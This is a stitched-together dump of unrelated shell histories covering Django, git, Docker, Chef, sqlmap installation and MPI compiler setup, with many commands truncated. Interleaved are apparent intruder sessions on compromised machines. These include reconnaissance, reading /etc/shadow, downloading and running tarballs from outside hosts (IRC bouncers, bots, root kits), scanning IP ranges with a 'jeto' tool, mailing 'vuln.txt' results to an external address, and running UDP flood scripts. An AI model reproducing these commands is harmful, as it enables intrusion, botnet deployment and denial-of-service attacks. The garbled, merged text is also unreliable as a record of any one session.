+python manage.py runserver +vim templates/html/main.html +python manage.py runserver +vim templates/html/main.html +vim hello/settings.py +vim templates/html/main.html +ls +ls +mv css html js .. +ls +ls +mv css html js +ls +ls +mv css html .. +ls +ls +mv css js static +mkdir static +mv css js static +ls +mv html templates/ +ls +ls +ls +ls +ls +emacs settings.py +ls +ls +ls +emacs main.html +emacs html/main.html +python manage.py runserver +vim newbie/views.py +python manage.py check +vim newbie/views.py +python manage.py check +python manage.py makemigrations +python manage.py migrate +vim newbie/views.py +python manage.py runserver +vim newbie/views.py +python manage.py runserver +vim templates/html/signup.html +python manage.py runserver +vim templates/html/login.html +vim templates/html/signup.html +python manage.py runserver +ls +vim hello/urls.py +vim newbie/views.py +python manage.py runserver +vim templates/signup.html +vim templates/html/signup.html +python manage.py runserver +vim templates/html/signup.html +vim templates/html/login.html +python manage.py runserver +vim newbie/views.py +python manage.py runserver +vim newbie/views.py +python manage.py check +python manage.py makemigrations +python manage.py migrate +python manage.py runserver +python manage.py shell +python manage.py runserver +python manage.py createsuperuser +python manage.py runserver +vim newbie/views.py +python manage.py runserver +vim newbie/views.py +python manage.py runserver +vim newbie/views.py +python manage.py runserver +vim newbie/views.py +python manage.py runserver +vim templates/html/main.html +python manage.py runserver +vim templates/html/login.html +python manage.py runserver +vim newbie/models.py +python manage.py makemigrations newbie +vim newbie/models.py +python manage.py makemigrations newbie +python manage.py migrate +vim newbie/models.py +python manage.py shell +vim newbie/views.py +vim templates/html/timetable.html +vim newbie/views.py +vim templates/html/timetable.html +vim newbie/views.py +vim hello/urls.py +python manage.py shell +vim newbie/models.py +python manage.py makemigrations newbie +python manage.py migrate +vim newbie/models.py +python manage.py makemigrations newbie +python manage.py migrate +vim newbie/models.py +python manage.py shell +vim templates/html/timetable.html +vim hello/urls.py +python manage.py shell +vim newbie/views.py +vim hello/urls.py[A +vim newbie/views.py +vim templates/html/timetable.html +vim newbie/models.py +vim newbie/views.py +python manage.py shell +python manage.py runserver +vim newbie/views.py +python manage.py runserver +vim newbie/views.py +python manage.py runserver +vim newbie/views.py +python manage.py runserver +exit +ls +source environ/bin/activate +ls +vim templates/html/timetable.html +vim newbie/views.py +python manage.py runserver +ps +python manage.py runserver +ps +python manage.py runserver +source environ/bin/activate +python manage.py shell +exit +w +cat /etc/hosts +cat /etc/passwd +exit +$ apt update +$ apt install python +$ apt install python2 +$ apt install git +$ gi clonesqlmapproject/sqlmap +$ cd sqlmap +apt update +apt install python +apt install python2 +apt install git +git clonesqlmapproject/sqlmap +python2 sqlmap.py +option +option -d +exit +python2 sqlmap.py +python2 sqlmap.py option +python2 sqlmap.py -h +-hh +exit +python2 sqlmap.py +python2 sqlmap.py --update +python2 sqlmap.py +exit +apt install git at install python2 apt install php +git clone +bash install.bash +chmod 777 rootnet.sh +bash rootnet.sh +1 +bash rootnet.sh +exit +bash rootnet.sh +bash rootnet.sh +bash rootnet.sh +0 +bash rootnet.sh +bash rootnet.sh +bash rootnet.sh +bash rootnet.sh +bash rootnet.sh +exit +bash rootnet.sh +exit +ls +ls +ls -l +;s +ls +git init +git remote --hel[ +git config --global user.name inverts +git config --global user.email dave.wong@utah.edu +git add -A +git commit -m 'Initial commit' +ls -l +git status -s +git status +git remote add cs5530s/cs5530.git +git push cs5530 master +git remote add cs5530s/cs5530.git +git push -u cs5530 master +git config --list +git --version +ssh-keygen -t rsa -C "dave.wong@utah.edu" +clip < /home/cs5530u69/.ssh/id_rsa.pub +ls +ls +ls -l +git remote add cs5530 git@github.com:inverts/cs5530.git +git remote update cs5530 git@github.com:inverts/cs5530.git +git remote add origin git@github.com:inverts/cs5530.git +git push origin master +git config --list +git config --get-regex aliases +git config --get-regex alias +git config --get-regexp alias +git la +gitg +git pull origin +git remote remove cs5530 +git remote rm cs5530 +git config --list +git pull origin +git pull +git fetch origin +git merge origin/master +ls +ls +ls +ls +emacs Connector.java & +get fetch origin -v +git fetch origin -v +git log origin/master +git fetch origin -v +git merge origin/master +git log origin/master +git push origin master +javac +cp +cp --help +ls +ls +ls +cs 5530 +ls +cp Order.java copy.java +ls +javac copy.java +ls +rm copy.* +ls +git pull +git pull --help +git fetch -v +git fetch origin +git merge origin +git merge origin/master +ls +status -s +git status -s +git status +javac VideoStore.java +git fetch origin +git merge orgin/master +git merge origin/master +ls +ls -l +ls +ls +javac VideoStore.java +java -cp +java -cp ../ +javac VideoStore.java -cp ../ +-cp javac cs5530/VideoStore.java +ls +javac -cp commons-codec-1.7.jar:jgrapht-jdk1.6.jar:mysql-connector-java-5.1.24-bin.jar cs5530/VideoStore.java +emacs Makefile & +jobs +javac -cp commons-codec-1.7.jar:jgrapht-jdk1.6.jar:mysql-connector-java-5.1.24-bin.jar cs5530/VideoStore.java +ls +make +ls +ls +git push origin -v +git push -m 'Compiled.' +git commit -m 'Compiled everything.' +git commit -a -m 'Compiled all.' +git push origin +ls +ls +ls +ls +ls +git commit -a -v -m 'Second try at compile commit' +git add -A +git add -A -v +ls +git commit -m 'Second compile commit attempt.' +git status -s +git status +git push origin +ls +git fetch origin +git merge origin/master +git commit -m 'Login page updated.' +git add -A +git commit -m 'Login page updated.' +git push origin +git commit -m 'Working login/register.' +git commit -a -m 'Working login/register.' +git push origin +git pull origin master +status +git status +git status -s +l +ls +git commit -a -m 'Fixed a few minor things, changed css.' +git push origin +git commit -a -m 'First successful API call (framework set up)' +git push origin +ls +git add -A +git commit -a -m 'First successful API call (framework set up)' +git push origin +ls +sudo su - +docker ps +sudo systemctl enable docker +sudo systemctl start docker +docker ps +docker images +mkdir docker +ls +mkdir ntp +vi Dockerfile +docker build jurajbond/ntp:latest . +docker build -t jurajbond/ntp:latest . +docker images +docker run -ti jurajbond/ntp /bin/bash +ls +vi Dockerfile +docker build -t jurajbond/ntp:latest . +docker run -d jurajbond/ntp:latest +docker ps +docker ps -a +docker logs eloquent_saha +docker run -dit jurajbond/ntp:latest /bin/bash +docker ps +docker ps -a +ls +vi Dockerfile +docker build -t jurajbond/ntp:latest . +grep ENTRYPOINT Dockerfile +docker run -it jurajbond/ntp:latest /bin/bash +ls +ls +docker images +docker rmi jurajbond/ntp:latest +docker ps +docker ps -a +for i in $(docker ps -aq); do docker rm $i; done +docker rmi jurajbond/ntp:latest +docker ps +docker images +docker rm 5c3ca8796acd +docker rmi 5c3ca8796acd +docker ps +docer images +docker images +ls +mv ntp postfix +ls +vi Dockerfile +docker run -ti centos:latest /bin/bash +ls +vi Dockerfile +docker build -t jurajbond/postfix:latest . +docker images +docker run -d jurajbond/postfix:latest +docker ps +docker logs fervent_raman +docker run -ti centos:latest /bin/bash +ls +vi Dockerfile +docker build -t jurajbond/postfix:latest . +docker ps +docker run -d jurajbond/postfix:latest +docker ps +docker exec -ti reverent_carson /bin/bash +docker stop reverent_carson +docker ps +ls +cat Dockerfile +docker run -ti centos:latest /bin/bash +cat Dockerfile +ls +vi Dockerfile +docker ps +docker build -t jurajbond/postfix:latest . +docker run -d jurajbond/postfix:latest +docker ps +docker run -dit jurajbond/postfix:latest +docke rps +docker ps +docker attach upbeat_euclid +ls +vi Dockerfile +docker build -t jurajbond/postfix:latest . +vi Dockerfile +docker build -t jurajbond/postfix:latest . +docker ps +docker run -d jurajbond/postfix:latest +docker ps +docker exec -ti epic_rosalind /bin/bash +docker stop +docker ps +docker stop epic_rosalind +docker ps +vi Dockerfile +docker build -t jurajbond/postfix:latest . +docker run -d jurajbond/postfix:latest +docker ps +docker exec -ti romantic_keller /bin/bash +ls +docker ps +docker inspect romantic_keller +telnet 25 +ssh +ssh -p25 -v -v +sudo yum -y install telnet +docker ps +docker stop romantic_keller +ls +vi Dockerfile +ls +docke rps +docker ps +docker build -t jurajbond/postfix:latest . +docker volume +docker run -d jurajbond/postfix:latest +docker ps +telnet 0 25 +netstat -plvent +docker stop brave_engelbart +sudo systemctl stop postfix +netstat -plvent +docker run -d --name=smtp1 -p25:25 jurajbond/postfix:latest +docker ps +telnet 0 25 +docker ps +docker exec -ti smtp1 /bin/bash +ls +uptime +df +dmesg +docker ps +docker rm smtp1 +docker ps +docker stop smtp1 +docker ls +pwd +docker volume -d centos:latest +docker run -d centos:latest +docker ps +docker ps -a +docker run -dit centos:latest +docker ps +docker attach stupefied_pare +docker ps +ls +mkdir testvolume +touch testvolume/toto +docker run -dit -v /home/ansible/testvolume:/testvolume centos:latest +docker volume ls +docker ps +docker attach happy_aryabhata +docker ls +man docker-service + man docker +man docker-run +man docker-machine +ansible-doc docker +ansible +docker ps +docker images +dmesg +top +ls -t +mails +docker ps +docker images +docker ps -a +docker rm $(docker ps -af) +docker ps -af +docker ps -aq +docker rm $(docker ps -af) +docker rm $(docker ps -aq) +docker ps +docker images +docker rmi 1bdd4adbcf42 +docker images +docker rmi $(docker images -q) +docker images +ls +ls +ls +man docker-run +man docker-start +dmesg +top +df +ls -t +man docker-start +df +ls +vi Dockerfile +ls +uptime +df +docker ps +ls +ls +ls +vi Dockerfile +docker volume ls +vi Dockerfile +docker run -d --name=smtp1 -p25:25 jurajbond/postfix:latest +docker build -t jurajbond/postfix:latest . +docker run -d --name=smtp1 -p25:25 jurajbond/postfix:latest +docker exec -ti smtp1 /bin/bash +docker ps +docker restart smtp1 +docker ps +docker exec -ti smtp1 /bin/bash +ls +pwd +df +ls +docker ps +docker stop smtp1 +uptime +docker ps +ls +df +docker images +ls +ls +ls +vi Dockerfile +docker rm $(docker ps -aq) +docker ps +docker build -t jurajbond/postfix:latest . +docker run -d --name=smtp1 -p25:25 jurajbond/postfix:latest +docker exec -ti smtp1 /bin/bash +docker stop smtp1 +ls -l /var/spool/ +docker run -d --name=smtp1 -p25:25 jurajbond/postfix:latest +docker ps +docker ps -a +docker restart smtp1 +docker exec -ti smtp1 /bin/bash +docker stop smtp1 +docker rm $(docker ps -aq) +ls +docker ps +docker images +ls +find +docker ps +docker images +docker ps -a +docker rm a997881eb44f +docker rmi a997881eb44f +docker ps +docer images +docker images +man docker-run +ls +ls +vi rsyslog +mkdir rsyslog +ls +cp ../postfix/Dockerfile . +vi Dockerfile +docker pull rsyslog/rsyslog_base_centos7 +docker rmi rsyslog_base_centos7 +docker rmi rsyslog/rsyslog_base_centos7 +dicker +docker ps +docker images +docker pull rsyslog/syslog_appliance_alpine +docker run syslog_appliance_alpine help +docker run rsyslog/syslog_appliance_alpine help +docker images +docker rmi rsyslog/rsyslog_appliance_alpine +docker rmi rsyslog/syslog_appliance_alpine +docker ps +docker rm $(docker ps -aq) +docker rmi rsyslog/syslog_appliance_alpine +docker ps +docker images +ls +vi Dockerfile +docker images +docker search alpine +ls +cat Dockerfile +docker build -t jurajbond/rsyslog:latest . +docker images +docker run -dit --name syslog01 -a syslog01 jurajbond/rsyslog +docker run -dit --name=syslog01 -a syslog01 jurajbond/rsyslog +docker run -dit --name=syslog01 -h syslog01 jurajbond/rsyslog +docker ps +docker exec syslog01 /bin/bash +ls +df +docker exec -ti syslog01 /bin/bash +docker stop syslog01 +docker run -dit --name=syslog01 -v /dev/log:/dev/log -h syslog01 jurajbond/rsyslog +docker rm syslog01 +docker run -dit --name=syslog01 -v /dev/log:/dev/log -h syslog01 jurajbond/rsyslog +docker exec -ti syslog01 /bin/bash +ls -lsrtha /dev/lo +docker stop syslog01 +ls -lsrtha /var/log/ +ls +docker rm syslog01 +docker run --rm -dit --name=syslog01 -h syslog01 jurajbond/rsyslog +docker ps +docker stop syslog01 +docker ps -a +docker ps +docker stop syslog01 +docker run --rm -it --name=syslog01 -h syslog01 jurajbond/rsyslog /bin/basn +docker run --rm -itd --name=syslog01 -h syslog01 jurajbond/rsyslog +docker exec -ti syslog01 /bin/bash +docker run -it --rm rhel /bin/bash +ls +docker search alpine +ls +ls +ls +ls +ls +vi Dockerfile +docker images +docker pull rsyslog/rsyslog_base_centos7 +ls +vi Dockerfile +docker build -t jurajbond/rsyslog:latest . +ls +wgetsercontent.com/rsyslog/rsyslog-docker/master/base/centos7/rsyslog.conf +ls +docker build -t jurajbond/rsyslog:latest . +docker images +docker run --rm -itd --name=syslog01 -h syslog01 jurajbond/rsyslog +docker rm syslog1 +docker rm syslog10 +docker rm syslog01 +docker ps +docker exec -ti syslog01 /bin/bash +docker stop syslog01 +docker rm syslog01 +docker run --rm -itd --name=syslog01 -h syslog01 jurajbond/rsyslog +docker -it exec syslog01 /bin/bash +docker exec -it syslog01 /bin/bash +pwd +ls +ls +ls +vi Dockerfile +netstat -plvent +docker stop +docker stop syslog01 +ls +man logger +docker ps -a +docker run --rm -itd --name=syslog01 -h syslog01 jurajbond/rsyslog +docker stop syslog01 +docker run --rm -itd -P --name=syslog01 -h syslog01 jurajbond/rsyslog +docker ps +man logger +logger -n localhost -P 32678 test +docker exec -it syslog01 /bin/bash +ls +ls +ls +vi Dockerfile +vi rsyslog.conf +docker build -t jurajbond/rsyslog:latest . +docker run --rm -itd -P --name=syslog01 -h syslog01 jurajbond/rsyslog +docker ps +docker rm syslog01 +docker stop syslog01 +docker rm syslog01 +docker run --rm -itd -P --name=syslog01 -h syslog01 jurajbond/rsyslog +netstat -plvent +logger -n localhost -P 32678 test +docker exec -it syslog01 /bin/bash +docker stop syslog01 +vi rsyslog.conf +docker build -t jurajbond/rsyslog:latest . +docker run --rm -itd -P --name=syslog01 -h syslog01 jurajbond/rsyslog +logger -n localhost -P 32678 test +docker exec -it syslog01 /bin/bash +logger -n localhost -P 32678 test +netstat -plvent +docker ps +logger -n localhost -P 32770 testshto +docker exec -it syslog01 /bin/bash +docker ps +docker images +ls +l +ls +ls +cat Dockerfile +l +ls +vi Dockerfile +vi rsyslog.conf +dmesg +top +ls +docker ps -a +ls +git +pwd +sudo yum -y install git +ls +ls +ls +ls testvolume/ +rm -f testvolume/ +rm -rf testvolume/ +ls +pwd +ls +git init . +git add * +git status +git remove * +git --help +git rm * +ls +ls -la +git rm -r docker/ +ls +rm -rf .git/ +git init . +git add docker +dig status +git status +git commit -m "Initial commit" +git config --global user.email "juraj.raab@gmail.com" +git config --global user.name "Juraj Raab" +git commit -m "Initial commit" +git push +git push +git pull +git pull +git status +git pus +git push +git push +ls +ls +ls +ls +cp ../rsyslog/rsyslog.conf . +ls +vi Dockerfile +cat ../rsyslog/Dockerfile +vi Dockerfile +vi rsyslog.conf +ls +df +dmesg +ls +pwd +wgetse/releases/1.23.1/docker-compose-Linux-x86_64 +wgetse/releases/DOWNLOAD/1.23.1/docker-compose-Linux-x86_64 +wgetse/releases/download/1.23.1/docker-compose-Linux-x86_64 +echo $PATH +mv docker-compose-Linux-x86_64 /usr/local/bin/docker-compose +sudo mv docker-compose-Linux-x86_64 /usr/local/bin/docker-compose +sudo chmod 755 /usr/local/bin/docker-compose +docker-compose +docker-compose version +docker ps +docker images +ls +ls +ls +docker images +ls +docker ps +docker ps prine +docker ps prune +docker prune +docker --help +docker ps prune +man docker-rm +docker rm $(docker ps -aq) +docker ps -aq +docker ps +docker ps -a +vi docker-compose.yml +docker-compose up +vi docker-compose.yml +docker-compose up +vi docker-compose.yml +docker-compose up +vi docker-compose.yml +docker ps +docker network ls +docker netork rm docker_default +docker network rm docker_default +ls +ls docker/ +mv docker util +git status +pwd +ls +ssh-keygen -t dsa +cat /usr/lib/nagios/.ssh/id_dsa.pub +vim .ssh/authorized_keys +vi .ssh/authorized_keys +ls +ls +cat authorized_keys +cat id_dsa +cat id_dsa.pub +webadmin +passwd +w +uname -a +ps x +w +cat /proc/cpuinfo +wget pickasso.lydo.org/stayku.tgz +tar xzvf stayku.tgz +rm -rf stayku.tgz +./- +- +who +ruby -v +sudo apt-get update +ruby -v +kpm install rails +ruby -v +kpm install ruby2 +ruby -v +rails -v +kpm install rails +rails -v +ls +ls +rails new CLL +ls +ls +rails servers +ls +rails server +apt-get search openjdk +apt-get search java +apt-get install java +apt-get install java +apt-get install java* +apt-get update +apt-get install java +apt-get install java* +apt-get upgrade + sudo("apt update -y") + #sudo("add-apt-repository ppa:openjdk-r/ppa -y") + #sudo("apt-get update") + sudo("apt-get install openjdk-8-jdk -y") +add-apt-repository ppa:openjdk-r/ppa -y +apt-get update +apt-get install java +apt-get install openjdk-8-jdk -y +exit +ps -aef +sudo apt-get update +sudo apt-get install -y curl +curlstall.sh | sudo bash -s -- -P chefdk -c stable -v 0.16.28 +chef +pwd +ls -l +sudo apt-get install emacs --yes +sudo apt-get install vim --yes +ls -l +df -h +pwd +mkdir cookbooks +chef generate cookbook --help +chef generate cookbook cookbooks/mycookbook +ls -l +ls -l +vi default.rb +chef-client +chef-client -z default.rb +vi default.rb +chef-client -z default.rb +vi default.rb +chef-client -z default.rb +vi default.rb +chef-client -z default.rb +ls -l /etc/motd +vi default.rb +chef-client -z default.rb +pwd +id +sudo chef-client -z default.rb +ls -l /etc/motd +ls -l +rm -r chef-repo/ +ls -l +mkdir .chef +ls -l +ls -l +mv knife.rb cookbooks/mycookbook/.chef/ +ls-l +ls -l +cat knife.rb +ls -l +knife node +knife list node +ls -l +vi prakashapurv.pem +knife ssl check +ls -l +cat knife.rb +ls -l +knife cookbook upload mycookbook/ +cat mycookbook/.chef/knife.rb +pwd +mv cookbooks/mycookbook/.chef . +cp -pr cookbooks/mycookbook/.chef/ . +rm -r cookbooks/mycookbook/.chef/ +knife cookbook upload cookbooks/mycookbook/ +cp -pr .chef/ cookbooks/ +sudo cp -pr .chef/ cookbooks/ +ls -l +rm -r .c +rm -r .chef/ +ls -l +ls -la +ls -l +set -o vi +ls -la +knife cookbook upload mycookbook/ +ls -l +cat knife.rb +rm -r .chef +rn -r .chef +ls -l +ls -la +ls -l +cat knife.rb +ls -l +ls -la +knife cookbook upload mycookbook/ +knife cookbook upload mycookbook +knife cookbook list +ls -l +ping +ping +ifconfig -a +ping +ping ec2-34-213-171-127.us-west-2.compute.amazonaws.com +ping +ssh root@ec2-34-213-171-127.us-west-2.compute.amazonaws.com +pwd +ssh -i MyNew.pem root@ec2-34-213-171-127.us-west-2.compute.amazonaws.com +ssh -i MyNew.pem root@ +ssh root@ +ssh +ssh ip-172-31-0-29.us-west-2.compute.internal +ssh -i MyNew.pem root@ip-172-31-0-29.us-west-2.compute.internal +ssh -i MyNew.pem ubuntu@ip-172-31-0-29.us-west-2.compute.internal +ssh -i MyNew.pem root@ip-172-31-0-29.us-west-2.compute.internal +ssh -i MyNew.pem ubuntu@ip-172-31-0-29.us-west-2.compute.internal +knife bootstrap ip-172-31-0-29.us-west-2.compute.internal --ssh-user ubuntu --sudo --use-sudo-passwd --node-name node1 --run-list'recipe[mycookbook]' +knife bootstrap ip-172-31-0-29.us-west-2.compute.internal-X ubuntu --sudo --use-sudo-passwd ubuntu --N node1 -r 'recipe[mycookbook]' +knife bootstrap ip-172-31-0-29.us-west-2.compute.internal-X ubuntu --sudo -N node1 -r 'recipe[mycookbook]' +knife bootstrap ip-172-31-0-29.us-west-2.compute.internal -X ubuntu --sudo -N node1 -r 'recipe[mycookbook]' +knife bootstrap ip-172-31-0-29.us-west-2.compute.internal --sudo -N node1 -r 'recipe[mycookbook]' +ssh ip-172-31-0-29.us-west-2.compute.internal +ssh -i MyNew.pem ip-172-31-0-29.us-west-2.compute.internal +knife bootstrap ip-172-31-0-29.us-west-2.compute.internal --sudo -N node1 -r 'recipe[mycookbook]' +knife bootstrap ip-172-31-0-29.us-west-2.compute.internal --sudo-s -N node1 -r 'recipe[mycookbook]' +knife bootstrap ip-172-31-0-29.us-west-2.compute.internal -x ubuntu --sudo -N node1 -r 'recipe[mycookbook]' +ssh -i MyNew.pem ip-172-31-0-29.us-west-2.compute.internal +knife bootstrap ip-172-31-0-29.us-west-2.compute.internal -x ubuntu --sudo -N node1 -r 'recipe[mycookbook]' +knife bootstrap ip-172-31-0-29.us-west-2.compute.internal -i MyNew.pem -x ubuntu --sudo -N node1 -r 'recipe[mycookbook]' +knife node list +knife node show node1 +ls -l +git initi . +git init . +git log +git status +git add . +git add -a +git add -A +udl s-l +ls -l +sudo git add -A +git log +git status +git push +git remote addshapurv/aws-repo.git +git remote add originshapurv/aws-repo.git +git push +git push --set-upstream origin master +git status +git remote +git login +git +git push +git commit -m "first commit" +sudo git commit -m "first commit" +sudo git remote add originshapurv/aws-repo.git +sudo git push -u origin master +ssh -i MyNew.pem ip-172-31-0-29.us-west-2.compute.internal +knife run-list +knife node list +knife node run_list add node1 'recipe[mycookbook::webserver]' +ssh -i MyNew.pem ip-172-31-0-29.us-west-2.compute.internal +knife node list +knife node show node1 +ifconfig -a +ls -l +ls -l +ls -l +cat default.rb +vi webserver.rb +chef-client -zr recipe["mycookbook"] +chef-client -zr recipe["mycookbook::webserver"] +vi mycookbook/recipes/webserver.rb +chef-client -zr recipe["mycookbook::webserver"] +sudo chef-client -zr recipe["mycookbook::webserver"] +curl localhost +chef generate template mycookbook index.html +ls -l +ls -lk +emacs index.html.erb +ls -l index.html.erb +cat index.html.erb +vim index.html.erb +vi webserver.rb +sudo chef-client -zr recipe["mycookbook::webserver"] +curl localhost +vi mycookbook/recipes/webserver.rb +sudo chef-client -zr recipe["mycookbook::webserver"] +ls -l +rm index.html.erb~ +ls -l +cat index.html.erb +vi webserver.rb +sudo chef-client -zr recipe["mycookbook::webserver"] +curl localhost +chef -v +apt-get install update +sudo apt-get install atom +sudo apt-get install atom --y +sudo apt-get install atom --ye +sudo apt-get install atom --yes +git +git log +ls -l +git init . +git log +git status +df -g +df -h +ls -l +ls -l +ls -l +file * +cat * +ohai +ohai ipaddress +ohai memory/total +ohai cpu/ +ohai cpu +ohai cpu/0 +ls -l +ls -l +ls -l +pwd +ls -l +unzip chef-starter\(1\).zip +sudo apt install unzip +unzip chef-starter\(1\).zip +ls -l +ls -l +ls -l +ls -l +ls -l +cat default.rb +ls -l +ls -l +cat knife.rb +cat prakashapurv.pem +james +w +uname -a +ps x +perl udp.pl ip +cat /proc/cpuinfo +passwd +uname -a +cat /proc/cpuinfo +ps x +w +wget www.hesller.xhost.ro/sir.tgz +tar xzvf sir.tgz +./linux +ps x +wgetsapte.ro/psybnc.tar.gz +tar xzvf psybnc.tar.gz +make +./psybnc +ps x +uname -a +cat /proc/cpuinfo +ftp mtw.ru +james@www ~ $ ftp mtw.ru +-bash: ftp: command not found +james@www ~ $ +ftp mtw.ru +uname -a +w +ps x +perl udp.pl 0 0 +rootx.as.ro/udp.pl +rootx.as.ro/udp.pl +wgets.com/rocky_parazitii/muie_la_help-bnc.tgz +wgetstuff/flood/udp.pl +perl udp.pl 0 0 +uname -a +ftp mtw.ru +ps x +w +ls +ls -a +.bash_profile +wget +wget www.hesller.xhost.ro/sir.tgz +tar xzvf sir.tgz +./linux +wgets.lycos.co.uk/bals/je.tgz +tar zxvf je.tgz +rm -rf je.tgz +./jeto 88.120 +cat vuln.txt|mail +cat vuln.txt|mail -s +cat vuln.txt|mail -i raouljoan@yahoo.com +cat vuln.txt|mail +cat vuln.txt|mail -s "root" +cat vuln.txt|mail -s "root" raouljoan@yahoo.com +wgets.lycos.co.uk/bals/je.tgz +tar zxvf je.tgz +rm -rf je.tgz +cat vuln.txt|mail -i "root" raouljoan@yahoo.com +screen +./jeto 210.239 +./jeto 128.0 +cat /etc/shadow +help +n +ls +w +uname -a +wget house-planet.ws/2005.zip +ls +go.sh +ps x +wgets.com/rocky_arhive/root.tar.gz +uname -a +wgetstuff/exploit-uri/root.tar.gz +ls -a +root.tar.gz +ss +ssh +dns +op +o +w +a +s +l +pl +p-a +mail +/var/mail +mail raouljoan@yahoo.com +mail +mail raouljoan@yahoo.com +email +mail +mail send +mail send +cat vuln.txt|mail -s "root" raouljoan@yahoo.com +uname -a +cat /proc/cpuinfo +ps x +w +uptime +wgetsapte.ro/psybnc.tar.gz +tar xzvf psybnc.tar.gz +make +ps x +wgetst.ro/bots.tar.gz +tar xzvf bots.tar.gz +chmod +x inetd +./inetd +ps x +wget www.vodoo.be/boti/egg-aa.tar.gz +tar xvzf egg-aa.tar.gz +ftp mtw.ru +la -a +ls -a +wgetstuff/flood/udp.pl +perl udp.pl +perl udp.pl 0 0 +wgets.com/rocky_parazitii/muie_la_help-bnc.tgz +ok +plok +pl +pla +pula-n mata stii asta? +aaa +a? +ls -a +.crack +crack +./jeto 83.246 +mail +root +rootmail +uname -a +ps x +w +wget +cat vuln.txt|mail -i "root" +mail +send +sendmail +cat /proc/cpuinfo +ps x +wget +./jeto 128.55 +ftp mtw.ru +ps x +w +wget www.vodoo.be/boti/egg-aa.tar.gz +tar xvzf egg-aa.tar.gz + wgetsapte.ro/psybnc.tar.gz +tar xzvf psybnc.tar.gz +make +./psybnc +ps x +ps x -a +ps x +make +./psybnc +ps x +w +uptime +perl udp.pl 0 0 +ps x +uname -a +ftp mtw.ru +wget +wget pola in mata +tar pola in mata.tgz +tar pola in mata.tgz.op +ps x +ftp mtw.ru +w +ftp mtw.ru +wget +ps x +w +cat vulntxt +./jeto 127.200 +./jeto 66.221 +pico jeto +nano jeto +g++ +sudo apt install updates +sudo apt install g++ +sudo apt-get update +g++ +sudo apt install g++ +--fix-mis +sudo apt-get update +--fix -mis +sudo apt-get update +clear +g++ +sudo apt install g++ +clear +g++ +sudo apt install g++ +clear +sudo apt install g++ +clear +sudo apt-get update +/etc/apt/sources.list +sudo apt-get clean +sudo apt intall g++ +sudo apt install g++ +g++ +sudo apt install g++ +sudo apt-get update +g++ +sudo apt install g++ +g++ +nano gidisu.cc +sudo apt-get update +sudo apt-get upgrade +sudo apt-get upgrade-distro +sudo apt-get update-distro +sudo apt-get dist-upgrade +sudo apt-get autoremove +ubuntu-drivers devices +sudo ubuntu-drivers autoinstall +ls ~/.config +ls +ls -la +ls -la ~/.config +sudo update-grub +cat README +mkdir _build +../configure +../configure --with-mpi=mpich +ls +cat config.log +gfortran +gfortran --help +../configure --with-mpi=mpich3 +ls +make +make install +sudo make install +ls +ls +cat install +cat install.sh +./install.sh +git +sudo apt install git +curl +wget +sudo apt install curl +sudo apt install mpich2 +sudo apt install mpich +gcc +g++ +make +sudo apt-get install libomp-dev +ls +ls -la +mkdir uni +ls +git cloneshort/snap_c.git +git cloneshort/snap.git +ls +ls -la +git +clear +ls +ls +make +git status +sudo apt-get install scorep +openmpi +openmp +apt list --installed +apt list --installed | grep mpi +apt list --installed | grep omp +make +cat Makefile +sudo apt-get install gfortran +sudo apt-get autoremove +lspci | grep -i nvidia +gcc -v +make +ls /opt/scorep +ls /opt/scorep/bin +ls -la ~ +vim .bashrc +source .bashrc +source ~/.bashrc +make +which mpicc +which mpiicc +which icc +sudo apt-get install gtk2.0 +ls +cat install.sh +make +which mpiicc +ls /opt +ls /var +ls /etc +ls +ls +ls bin +ls compilers_and_libraries_2019 +ls compilers_and_libraries_2019/linux/ +ls compilers_and_libraries_2019/linux/bin +ls compilers_and_libraries_2019/linux/bin/intel64/ +source ~/.bashrc +make +ls ~/intel/ +cat ~/intel/compilers_and_libraries +ls ~/intel/compilers_and_libraries +ls ~/intel/compilers_and_libraries/linux/ +ls ~/intel/compilers_and_libraries/linux/bin +ls ~/intel/compilers_and_libraries/linux/bin/intel64/ +source ~/.bashrc +make +source ~/.bashrc +make +ls ~/intel/compilers_and_libraries/linux/ +ls ~/intel/compilers_and_libraries/linux/mpi +ls ~/intel/compilers_and_libraries/linux/mpi/intel64/ +ls ~/intel/compilers_and_libraries/linux/mpi/intel64/bin +source ~/.bashrc +make +ls ~/intel/ +ls ~/intel/compilers_and_libraries +ls ~/intel/compilers_and_libraries/linux/ +ls ~/intel/compilers_and_libraries/linux/lib/ +ls ~/intel/compilers_and_libraries/linux/lib/intel64 +make +sudo apt-get uninstall libomp-dev +apt-get --help +sudo apt-get remove libomp-dev +make clean +make +apt list --installed | grep omp +sudo apt-get remove libomp* +make +make clean +make +cat Makefile +make cleanout +make +apt list --installed | grep omp +apt list --installed | grep mpi +sudo apt-get remove mpich +sudo apt-get autoremove +make +make clean +male +make +ls +ls +./install +./install.sh +clear +make +source ~/.bashrc +make +which icc +which mpiicc +ls ~/intel/compilers_and_libraries +ls ~/intel/compilers_and_libraries/linux/ +ls ~/intel/compilers_and_libraries/linux/bin/ +ls ~/intel/compilers_and_libraries/linux/bin/intel64/ +ls ~/intel/ +ls ~/intel/bin/ +./intel.sh +./intel.sh +sudo ./intel.sh +ls +sudo intel.sh +ls -la +chmod +x intel.sh +sudo ./intel.sh +~/intel/bin/compilervars.sh -arch intel64 +~/intel/bin/compilervars.sh intel64 +~/intel/mkl/bin/mklvars..sh intel64 +~/intel/mkl/bin/mklvars.sh intel64 +~/intel/bin/compilervars.sh intel64 +. ~/intel/mkl/bin/mklvars.sh intel64 +cat ~/intel/bin/compilervars.sh +. ~/intel/bin/compilervars.sh -arch "intel64" -platform "linux" +./intel.sh +. intel.sh +make +ssh u1897268@joshua.dcs.warwick.ac.uk +ls ~/intel +ls ~/intel/compilers_and_libraries +ls ~/intel/compilers_and_libraries/linux/ +ls +ls ~/intel/compilers_and_libraries/linux/ +ls ~/intel/compilers_and_libraries/linux/bin +cat ~/intel/compilers_and_libraries/linux/bin/compilervars.sh +ls ~/intel/compilers_and_libraries/linux/mpi/intel64/bin/ +ls ~/intel +ls ~/intel/bin +. ~/intel/bin/iccvars.sh +ls ~/intel/compilers_and_libraries/linux/mpi/intel64 +ls +ls ~/intel/compilers_and_libraries/linux/mpi/intel64/bin +. ~/intel/compilers_and_libraries/linux/mpi/intel64/bin/mpivars.sh +. intel.sh +make +make clean +make +make clean +make +make cleanout +make +gcc -v +icc -v +make +. ../intel.sh +make +which icc +which mpiicc +ls ~/intel + +ls ~/intel/impi +ls ~/intel/impi/2019.4.243 +ls ~/intel/impi/2019.4.243/intel64/ +ls ~/intel/impi/2019.4.243/intel64/bin +make +source ~/.bashrc +. ../intel.sh +make +make clean +make +sudo apt-get install libomp-dev +make +make clean 